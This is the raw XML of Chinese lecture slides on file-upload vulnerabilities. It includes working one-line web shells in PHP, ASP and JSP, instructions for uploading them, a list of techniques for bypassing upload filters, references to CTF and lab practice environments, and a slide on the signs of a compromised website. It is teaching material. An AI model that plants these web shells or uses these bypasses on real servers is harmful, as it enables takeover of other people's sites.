                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>这个有问题的文件通常是木马</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>。如果服务器的处理逻辑做的不够安全，则会导致严重的后果</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2400" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>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8"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="11" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="8198"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="12"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文件上传漏洞条件</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2442210" y="1018540"/>
            <a:ext cx="3268980" cy="2748280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPct val="180000"/>
              </a:lnSpc>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文件可上传</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPct val="180000"/>
              </a:lnSpc>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知道文件上传的路径</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPct val="180000"/>
              </a:lnSpc>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上传文件可以被访问</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPct val="180000"/>
              </a:lnSpc>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上传文件可以被执行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A150D1-D6A0-8B6E-E1EE-CB050FF10EE4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5210048" y="806885"/>
            <a:ext cx="5892800" cy="3060700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="文本框 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1C461125-44B5-E4AC-1333-EC2AD2519365}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1877568" y="126230"/>
            <a:ext cx="6096000" cy="502445"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2665" b="1" kern="10" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="经典特宋简" pitchFamily="49" charset="-122"/>
                <a:sym typeface="+mn-ea"/>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sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>请求（</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sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Get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sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4131A953-0288-7246-8FEC-A73F717AABC9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2758440" y="3062160"/>
            <a:ext cx="7772400" cy="2940908"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="6" name="组合 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{17FA2DB6-B796-1436-DB1F-7D48605E9A2E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1927656" y="24918"/>
            <a:ext cx="9648394" cy="781967"/>
            <a:chOff x="2543606" y="42192"/>
            <a:chExt cx="9648394" cy="781967"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="圆角矩形 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9AB6C03D-E632-198A-DAEC-F467B0418178}"/>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a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{39C9F3C7-AB09-7577-5F95-18D3BEACE898}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2831637" y="138202"/>
              <a:ext cx="3161699"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请求（</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GET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a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="215390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6456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文件上传漏洞</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一句话木马</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="文本框 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1927860" y="1769110"/>
            <a:ext cx="9359900" cy="4892675"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>#php</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>&lt;?php @eval($_POST['attack']) ?&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>#asp</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>&lt;%eval request ("pass")%&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>&lt;script language="php"&gt;@eval($_POST['qiyue']);&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>#jsp</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>&lt;%</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("\\")+request.getParameter("f"))).write(request.getParameter("t").getBytes());</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>%&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="文本框 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1927860" y="791845"/>
            <a:ext cx="9702165" cy="977265"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" kern="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>将</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" kern="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>一句话</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" kern="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>插入到网站上的某个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>asp/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="0" noProof="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>aspx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="0" noProof="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" kern="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>文件上，或者直接创建一个新的文件，在里面写入这些语句，然后把文件上传到网站上即可。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2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5515" y="781685"/>
            <a:ext cx="8451215" cy="1568450"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>测试环境本地搭建</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>：https://github.com/c0ny1/upload-labs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>BUUCTF在线环境</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>：BUUCTF -&gt; Challenges -&gt; Basic -&gt; Upload-Labs-Linux https://buuoj.cn/challenges#Upload-Labs-Linux</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文件上传漏洞学习环境</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2357120" y="2566670"/>
            <a:ext cx="5090795" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>文件上传一些入门思路</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="文本框 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2459990" y="3027045"/>
            <a:ext cx="8790305" cy="3415030"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1"/>
              <a:t>1.后缀名改.jpg .png，抓包修改，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>绕过前端验证</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" b="1"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1"/>
              <a:t>2.改Content-Type，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>绕过前端验证</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" b="1"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1"/>
              <a:t>3. .htaccess  任意后缀执行php，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>绕过后缀名验证</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" b="1"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1"/>
              <a:t>4.后缀改php3、php5、php7、phtml、大小写等，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>绕过后缀名验证</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" b="1"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1"/>
              <a:t>5.&lt;script language="php"&gt;@eval($_POST['qiyue']);&lt;/script&gt; 绕过&lt;?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1"/>
              <a:t>6.添加GIF89a头文件，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>绕过exif_imagetype</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1"/>
              <a:t>7.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>包含</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1"/>
              <a:t>.user.ini，上传配置文件让木马文件得以解析</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1"/>
              <a:t>8.pphphp 双写后缀， 绕过后缀名删除</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1"/>
              <a:t>9. %00截断后缀名，条件竞争绕过自动删除等等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80845" y="2549525"/>
            <a:ext cx="10556240" cy="829945"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" b="1"/>
              <a:t>网站攻击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网站被攻击的常见形式</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1796415" y="1029335"/>
            <a:ext cx="10511155" cy="4742815"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>1.网站网页中出现大量的黑链</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>（网页）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>2.网站根目录中出现大量植入的网页</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>（文件目录）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>3.网站网页被挂马</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>（网页）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>4.网站服务器运行缓慢，被植入蠕虫等病毒</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>（文件目录）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>5.网站域名DNS劫持</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>（域名）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>6.网站和服务器密码被篡改</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>（数据库）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>7.网站数据库被植入新内容</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
